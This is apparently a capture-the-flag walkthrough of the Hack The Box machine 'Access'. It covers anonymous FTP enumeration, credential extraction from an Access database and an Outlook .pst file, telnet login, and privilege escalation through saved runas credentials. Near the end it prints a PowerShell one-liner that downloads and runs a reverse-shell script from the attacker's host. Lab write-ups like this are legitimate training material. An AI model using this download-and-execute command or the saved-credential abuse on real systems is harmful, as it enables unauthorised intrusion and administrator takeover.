Access is an easy Linux box that can be exploited by enumerating the FTP server and finding two useful files. After decrypting the backup.mdb you will find credentials that can be used to unzip an archive. This archive contains a .pst file which contains an email with credentials. These credentials were then used to authenticate to the Telnet Server. Privileges were escalated by abusing runas and obtaining an Administrative shell.
This is a manual walkthrough without using Metaploit
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.105.253 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) 23/tcp open telnet? 80/tcp open http Microsoft IIS httpd 7.5
Nmap showed that FTP is used and anonymous login is allowed. The FTP directory contained the following files:
08-23-18 08:16PM DIR Backups 08-23-18 08:16PM 5652480 backup.mdb 08-24-18 09:00PM DIR Engineer 08-24-18 12:16AM 10870 Access Control.zip
These were both downloaded with get. The zip file requires credentials so I checked the backup.mdb. This is a Microsoft Acess Database file. To gather information about this file you will hvae to install mdbtools:
sudo apt install mdbtools mdb-tables backup.mdb
This will produce a lot of tables, so let’s filter for interesting ones with user in them:
mdb-tables backup.mdb | grep -i user
I checked the interesting ones and the following table contained creds:
mdb-export backup.mdb auth_user id,username,password,Status,last_login,RoleID,Remark 25,"admin","admin",1,"08/23/18 21:11:47",26, 27,"engineer","access4u@security",1,"08/23/18 21:13:36",26, 28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
None of these work to obtain an authenticated FTP session so it made sense to try and use them to unzip the file that was obtained earlier. This also makes sense since you have an engineer account and the .zip was in the engineer folder. To unzip, use:
7z x -paccess4u@security Access\ Control.zip
This will create a file named: Access Control.pst. Okay, so the .pst file is an outlook data file. Since I don’t have outlook on kali linux to import it, I used readpst to export it:
readpst Access\ Control.pst
You can now read the email message:
Hi there, The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. Regards, John
Authenticated FTP Shell
Sweet, so we obtained a new account. Since the webserver does not contain any sort of login page and the credentials didn’t work with FTP, it made sense that the telnet port must be used for authentication. The following command was used to authenticate over telnet at port 23:
telnet 10.129.109.204 23 Trying 10.129.109.204... Connected to 10.129.109.204. Escape character is '^]'. Welcome to Microsoft Telnet Service login: security password: *=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\security>whoami access\security
Great, you now have a lower privileged shell as the security user. From here you have access to the user.txt.
You should always run this command to check if any credentials are stored:
cmdkey /list PS C:\Users\security> cmdkey /list Currently stored credentials: Target: Domain:interactive=ACCESS\Administrator Type: Domain Password User: ACCESS\Administrator
Sweet, in this case there are. This allows for an easy privilege escalation since you can abuse runas to run executables as the respective user. Start your python webserver and run the following command:
runas /user:ACCESS\Administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.147/Invoke-PowerShellTcp.ps1')"
This will run the powershell command to invoke the powershell reverse shell. This will provide you with a new reverse shell as Administrator:
Windows PowerShell running as user Administrator on ACCESS Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>PS C:\Windows\system32> PS C:\Windows\system32> whoami access\administrator
I quite enjoyed this box, the path was very straightforward since the attack vectors were limited. This was a pretty easy box, hope you learned something and enjoyed the writeup!